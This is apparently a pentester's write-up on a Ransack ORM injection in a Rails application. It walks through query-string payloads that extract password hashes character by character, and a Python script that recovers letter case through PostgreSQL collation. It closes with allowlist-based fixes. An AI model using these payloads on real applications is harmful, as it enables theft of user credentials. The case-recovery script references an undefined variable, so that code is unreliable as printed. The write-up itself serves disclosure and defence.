Exploiting a Ransack Query Injection on a Web Application

Ransack Query Injection: Analysis and Exploitation of an ORM Vulnerability

Developers often rely on libraries to manage communications with databases. This saves them from having to write raw queries.

These libraries generally support common operations such as searching and sorting data. This approach is generally preferable, provided that the libraries are kept up to date.

Writing raw queries is complex, and errors can easily lead to critical injection vulnerabilities.

To reduce these risks, many libraries offer a function-based approach. Developers interact with the database via method calls rather than manual queries. However, this mechanism is not foolproof, as it can introduce another category of vulnerabilities: ORM injections.

The vulnerability presented in this article was discovered during a web application penetration test. It focuses on injection issues affecting the Ruby Ransack library.

Comprehensive Guide to Exploiting a Ransack Injection

Introducing and using the Ransack library
Analysis and Exploitation of a Ransack Query Injection
How to Prevent Ransack Injection Vulnerabilities?

Introducing and using the Ransack library

Ransack is a widely used Ruby library with over 100 million downloads on RubyGems.

It is an object-oriented search library that can be used to search for objects. These searches are based on the value of their attributes or on more complex conditions. Ransack also allows you to sort the results.

Ransack queries are based on predicates. The syntax for a simple search query is as follows:

${field}_${predicate}

field: corresponds to the name of an attribute. It can be a direct attribute of the searched object or an attribute linked via an association.
predicate: defines the operation to be applied. For example, eq returns records whose field exactly matches the value provided. start checks whether a field begins with a specific value. null returns records whose field value is equal to NULL.

The complete list of predicates is available in the official Ransack documentation.

Example of a search with Ransack

Let’s consider the Post table defined below:

create_table "posts", force: :cascade do |t|
  t.text "body"
  t.datetime "created_at", null: false
  t.string "title"
  t.datetime "updated_at", null: false
  t.bigint "user_id", null: false
  t.index ["user_id"], name: "index_posts_on_user_id"
end

Five fields are created for Post: title, body, created_at, updated_at, and user_id.

The user_id field refers to the user who owns the post.

The Post class is defined as follows:

class Post < ActiveRecord::Base  
  belongs_to :user  
end

For example, we want to return all posts whose body field contains the value ‘Vaadata’. To do this, we can call Ransack on the model with the following query:

@q = Post.ransack(body_cont: 'Vaadata')

body corresponds to the field name and _cont is the predicate used.

This query returns all records whose body field contains the value ‘Vaadata’. The cont predicate allows you to search for a value included in a given field.

Translating a Ransack query into SQL

The SQL equivalent of this query can be obtained by calling the to_sql function.

Post.ransack(body_cont: 'Vaadata').result.to_sql

It returns the following result :

SELECT "posts".* FROM "posts"  
WHERE ("posts"."body" ILIKE '%Vaadata%')

The predicate cont is translated into SQL by the ILIKE operator. The searched value is surrounded by % characters. This allows any characters before or after the value to be matched. In this example, the database used is PostgreSQL.

Using OR and AND operators with Ransack

Ransack also allows the use of OR and AND operators. The syntax is as follows:

${field1}_${combinator}_${field2}_${predicate}

For example, if we want to search for articles containing the value ‘Vaadata’ in the title OR the body, we can use title_or_body_cont.

@q = Post.ransack(title_or_body_cont: 'Vaadata')

The OR operator is used between title and body. The generated SQL query is as follows:

SELECT "posts".* FROM "posts"  
WHERE ("posts"."title" ILIKE '%Vaadata%'  
OR "posts"."body" ILIKE '%Vaadata%')

Following this brief introduction to Ransack and its syntax, we will now examine the Ransack injection vulnerability in detail.

Analysis and Exploitation of a Ransack Query Injection

Security audit context

We conducted a security audit of a web application. The application had a user management feature that allowed managers to search for users and filter them by ID or email address.

We had access to the source code, which saved us some time during the audit. However, this vulnerability could also be exploited using a black box approach.

Identification of unusual query parameters

While manipulating the user search form, we noticed some unusual query parameters.

GET /users?q[id_eq]=&q[email_cont]=vaadata HTTP/1.1
Host: [REDACTED]

The parameters contained the values _eq and _cont after the field names id and email, which is unusual.

At first glance, we did not recognise this syntax. After a quick review of the source code, the term ransack appeared.

# from the source code of the application
User.all.ransack params[:q]

It then became apparent that user-controlled parameters were being passed directly to the ransack function via params[:q]. In other words, the user had complete control over what was being passed to the ransack function.

Understanding the Ransack mechanism and initial exploitation tests

A question then arose: could this situation be exploited?

We were unfamiliar with Ransack and how it worked. But after some research, we learned that it was a Ruby library used primarily to search and sort objects.

After consulting the documentation and understanding how it worked, a simple idea for exploiting it emerged.

Was it possible to query more sensitive attributes, such as the password field?

After a few tests, it seemed possible. There appeared to be no mechanism blocking access to users’ password fields.

Exfiltration of the password field with the _start predicate

To extract this field, we used the _start predicate. Using a trial-and-error approach, the data could be gradually reconstructed, character by character.

The target user during the exploit was [email protected].

It is important to note that two distinct states must be observable in order to use this approach. In our case, when an incorrect character was sent, the server returned an empty response. On the other hand, a correct character resulted in the return of complete information about the user [email protected].

This made it possible to use a brute force attack based on successive attempts.

The payload used is shown below:

q[email_eq][email protected]&q[password_start]={testing_value}

Brute force of the bcrypt hash

As the password was stored as a bcrypt hash, the first character was naturally the $ symbol.

A simple script was used to automate the brute force attack.

q[email_eq][email protected]&q[password_start]=$
q[email_eq][email protected]&q[password_start]=$2
q[email_eq][email protected]&q[password_start]=$2a
q[email_eq][email protected]&q[password_start]=$2a$
q[email_eq][email protected]&q[password_start]=$2a$1
...
q[email_eq][email protected]&q[password_start]=$2a$1[...HASH IN LOWERCASE...]o

However, we noticed some strange behaviour. All the characters extracted from the bcrypt hash were lowercase.

After repeating the attack, we realised that using the _start predicate only extracted lowercase characters, which was not the expected result.

It is important to have the exact bcrypt hash in order to crack it effectively. An incorrect hash makes this operation much more difficult.

We first looked for other predicates that would allow us to retrieve the exact hash, respecting case sensitivity. No predicate seemed to work in a case-sensitive manner, except for _eq.

As we understand it, the problem stems from the fact that Ransack uses the ILIKE operator in SQL queries. This operator performs case-insensitive comparisons.

We then tried using the _eq predicate, as it seemed to be the only one that performed a case-sensitive comparison.

The first problem we encountered was that this predicate does not allow characters to be retrieved one by one. It only returns a result when the entire value matches exactly.

Limits of brute force with the _eq predicate

It is theoretically possible to use a list of values to launch a brute force attack and find the exact hash. This would involve generating a list of potential hashes, considering each character in lowercase and then uppercase.

We quickly realised that this approach was not feasible within a reasonable timeframe.

The bcrypt hash is 60 characters long.
The first 7 characters are always $2a$10$.
The remaining characters belong to the base64 alphabet ([a-zA-Z0-9/.-]).

In the worst case, if all the remaining characters are alphabetic, this represents 2^(60-7) = 9007199254740992 possibilities. Such a number cannot be brute-forced within a reasonable time frame.

Finding a hash containing fewer alphabetical characters would reduce the number of possibilities. However, on average, this number remains very high. This approach was therefore abandoned, as it did not solve the problem.

Other attempts and conclusion of the exploitation

It should be noted that there is an interesting predicate called _eq_any. It allows multiple values to be tested at once. However, the number of possibilities remains too large. This idea was therefore also abandoned.

Another approach was quickly tested. It consisted of retrieving the exact characters using comparison predicates, such as _lt (less than) and _gt (greater than).

This attempt was unsuccessful. We were unable to determine whether the comparison was case-sensitive. Due to lack of time, the vulnerability was reported as is.

The ability to exfiltrate user password hashes, even in lowercase, should not be possible and requires correction.

Additional notes on our exploitation attempts

It is important to note that there was no reset password token field in the database. Users could therefore not reset their passwords without being authenticated.

The theft of a reset password token would have allowed an account to be compromised. This would probably have been easier to exploit, as this type of token is generally shorter. Unfortunately, in our case, only the password field was present.

Ransack also allows you to query association fields. The syntax for a query is as follows:

{association_name}_{association_name}_..._{field}_{predicate}

For example, in our initial example, the Post class has a many-to-one relationship with the User class.

It is therefore possible to return posts where the user’s email contains the value ‘vaadata’ with the following parameter:

q[user_email_cont]=vaadata

user corresponds to the name of the association.
email is the name of the field.
cont is the predicate used.

During the audit of this application, we were able to interact directly with the User model. It was therefore not necessary to explore the associations. Otherwise, it would have been sufficient to identify a chain of associations linking the queried model to the User model.

Bypassing the case-sensitivity limitation in Ransack

Purpose and context of additional tests

After the security audit, we conducted further testing on Ransack. The goal was to find a solution to circumvent the case sensitivity limitation.

We set up a simple Ruby application. It used the Posts and Users classes, as in the initial example in the article.

We configured a PostgreSQL database like the one used by the audited application.

The question was: can the _lt and _gt predicates be used to recover the exact case-sensitivity of characters?

Understanding PostgreSQL comparison behaviour

During the audit, we did not know whether the comparison was case sensitive. After some initial testing, it appeared that neither natural order nor byte order was being used.

This raised the question: how does PostgreSQL sort strings?

The sort order is usually defined by the collation. To find out the collation used by the PostgreSQL database, we can run the following query:

select datname, datcollate from pg_database;
     datname      | datcollate
------------------+------------
 postgres         | en_US.utf8
 blog_development | en_US.utf8

Our database is named blog_development. We note that the collation used is en_US.utf8. This is the same collation as that of the audited application’s database.

The next question is: how does the en_US.utf8 collation sort character strings?

After consulting the PostgreSQL documentation and doing some research, it appears that this collation depends on the system. It is not specific to PostgreSQL.

Our PostgreSQL database is hosted in a Debian GNU/Linux 13 (trixie) Docker container.

Analysis of character sorting order

To understand the sorting order of strings on this instance, we can use the sort command. This command sorts characters according to the value of LC_COLLATE, which is en_US.utf8 in our case.

awk 'BEGIN {for(i=33;i<127;i++) printf "%c\n",i; print}' | sort | tr -d '\n'
!"#%&'()*+,-./:;<=>?@[\]^_`{|}~$0123456789aAbBcCdDeEfFgGhHiIjJkKlLmMnNoOpPqQrRsStTuUvVwWxXyYzZ

This sorting does not follow byte order. We observe that numbers are sorted before letters and that each uppercase letter is greater than its lowercase equivalent.

a < A
b < B
c < C
...
z < Z

We also note that, according to our tests, the empty string (‘’) is the smallest possible string.

What can we do with this information?

After some thought, we came to the following conclusion: a string is always greater than or equal to its lowercase version, according to these sorting rules.

Let’s take an example. Suppose we extracted the string abnxd in lowercase, but the actual value is abNxD.

# run this on postgres

select 'abNxD' >= 'abnxd'
# it yields TRUE

Based on our tests, even though we have not found explicit confirmation in the documentation, the behaviour appears to be as follows:

Strings are first compared in a case-insensitive manner. If no result can be determined at this stage, the comparison moves on to the next step.
The comparison continues character by character. As long as the characters in identical positions are equivalent, the comparison continues. When a difference is encountered, the previously identified sort order is used.

In our example, the first two characters are identical. The third character differs: “N” is compared to “n”. Since “N” is greater than “n”, the string “abNxD” is considered greater than “abnxd”.

Exploiting the comparison to find the case

This property can be exploited. It allows you to test characters one by one and determine whether they are uppercase or lowercase.

After several tests, we summarised the results in the table below. The first column corresponds to the position of the tested character.

Pos	Comparison	Result	Description
1	abNxD >= Abnxd	FALSE	‘a’ is not bigger than ‘A’
2	abNxD >= aBnxd	FALSE	‘b’ is not bigger than ‘B’
3	abNxD >= abNxd	TRUE	The characters are equal up to ‘D’ and ‘d’. ‘D’ is greater than ‘d’, so the actual value of ‘d’ is uppercase.
4	abNxD >= abNXd	FALSE	‘x’ is not bigger than ‘X’
5	abNxD >= abNxD	TRUE	The strings are identical. The actual value of “d” is uppercase.

We observe that:

when the result is FALSE, the actual character is lowercase;
when the result is TRUE, the actual character is uppercase.

In summary, if we already know the lowercase value of a string, we can find the exact case of the characters. We simply need to compare each character with its uppercase version using a comparison operator.

If the result is FALSE, the character is lowercase. Otherwise, it is uppercase.

Bypass validation via Ransack

To confirm this via Ransack, we inserted the following string into the body field of a post:

ThIs_IS_A_R4nd0m_$tring_t0_t35T

We then extracted it using the _start predicate. As mentioned above, this predicate only allows you to extract the lowercase version:

[*] found value = this_is_a_r4nd0m_$tring_t0_t35t

We then used the _gteq predicate to find the exact case.

Next, we used the following Python script to test the case of the characters and reconstruct the actual string:

import requests as req
import string

URI = "http://localhost:3000/posts"
VAL = "this_is_a_r4nd0m_$tring_t0_t35t"

# will correct the case-sensitivity of real_val progressively
real_val = VAL

L = len(VAL)
for i in range(L):
  c = VAL[i]
  # consider only alphabetical characters
  if not c.isalpha():
      continue
  testing_val = real_val[:i] + c.upper() + real_val[i+1:]
  resp = req.get(
    URI,
    params={
      "q[body_gteq]": testing_val,
    },
  )
  if "\"id\":1" in resp.text:
    real_val = test
    print(f"[*] found value = {real_val}\n")

print(f"[+] finished! recovered value is {real_val}")

The results of the script are illustrated here.

[*] found value = This_is_a_r4nd0m_$tring_t0_t35t
[*] found value = ThIs_is_a_r4nd0m_$tring_t0_t35t
[*] found value = ThIs_Is_a_r4nd0m_$tring_t0_t35t
[*] found value = ThIs_IS_a_r4nd0m_$tring_t0_t35t
[*] found value = ThIs_IS_A_r4nd0m_$tring_t0_t35t
[*] found value = ThIs_IS_A_R4nd0m_$tring_t0_t35t
[*] found value = ThIs_IS_A_R4nd0m_$tring_t0_t35T
[+] finished! recovered value is ThIs_IS_A_R4nd0m_$tring_t0_t35T

We were thus able to recover the exact value.

Limitations of exploitation and applicability in audits

As mentioned earlier, this approach is only possible because we knew the collation used by the database.

In this particular case, the collation depended on the system. Knowing the system on which the database runs allowed us to find the character sort order.

As part of the security audit, it might have been possible to extract the exact value of the password hash using this approach. However, as the audit was complete, we were unable to test this method to confirm it.

How to Prevent Ransack Injection Vulnerabilities?

Evolution of the Ransack security model

Prior to version 4.0.0, all attributes and associations were searchable by default in Ransack. Starting with version 4.0.0, Ransack introduced major changes via a security fix. This fix requires users to explicitly define the attributes and associations that are allowed to be searched.

This configuration is done using the ransackable_attributes and/or ransackable_associations methods, as explained in the official documentation.

Impact of the security fix in our example

When building our initial example with Posts and Users, we used the latest version of the library. No ransackable_attributes had been defined.

The tests therefore failed and the following error was raised systematically:

RuntimeError (Ransack needs Post attributes explicitly allowlisted as searchable. Define a ransackable_attributes class method in your Post model, watching out for items you DON'T want searchable (for example, encrypted_password, password_reset_token, owner or other sensitive information). ...

This error is explicit. It clearly warns against exposing sensitive attributes. And it is important not to ignore this type of security warning.

Why was the vulnerability exploitable despite the patch?

To understand why this vulnerability was exploitable in the audited application, we began by checking the version of Ransack being used. To our surprise, it was indeed the latest version. The security patch was therefore present.

One question remained: why were we able to query the password attribute?

For this to be possible, this field had to be included in ransackable_attributes in the model. Without this, the queries would have failed.

Improper implementation of the fix in the application

After analysing the source code, the cause of the problem became apparent. The developers were used to the old version of Ransack. As a result, when the update was installed, the changes broke the application.

To quickly fix these regressions, they overloaded the ransackable_attributes method on almost all models and included all class attributes.

This application fix completely negates the security mechanism introduced by Ransack because it defeats the original purpose of the fix.

The vulnerability discovered illustrates precisely why this security measure is essential and should not be ignored.

Direct transmission of user settings to Ransack

Another bad practice was also present in the source code. The user-controlled parameter params[:q] was passed as-is to the ransack function.

This type of practice can lead to other vulnerabilities such as mass assignment.

This bad practice can even be seen in some examples in the Ransack documentation.

Restricting accepted parameters to counter Ransack injection attacks

Best practice is to explicitly define the permitted parameters in the code.

As part of our audit, the application was only supposed to allow users to be searched by ID or email address. It is therefore recommended that the accepted parameters be strictly restricted.

q_params = {}

# consider only the "id_cont" and "email_cont" if present
q_params[:id_cont]    = params.dig(:q, :id_cont) if params.dig(:q, :id_cont).present?
q_params[:email_cont] = params.dig(:q, :email_cont) if params.dig(:q, :email_cont).present?

# pass only "id_cont" or "email_cont" to the ransack function
User.ransack(q_params)

If this practice had been applied, the application would have been protected against this vulnerability. This would have been the case even without the additional security patch provided by the library.

In summary, to mitigate this vulnerability, only consider the necessary parameter names, where possible. In accordance with the changes imposed by Ransack, also define a whitelist of attributes and associations that can be searched via ransackable_attributes and/or ransackable_associations.

Author: Souad SEBAA – Pentester @Vaadata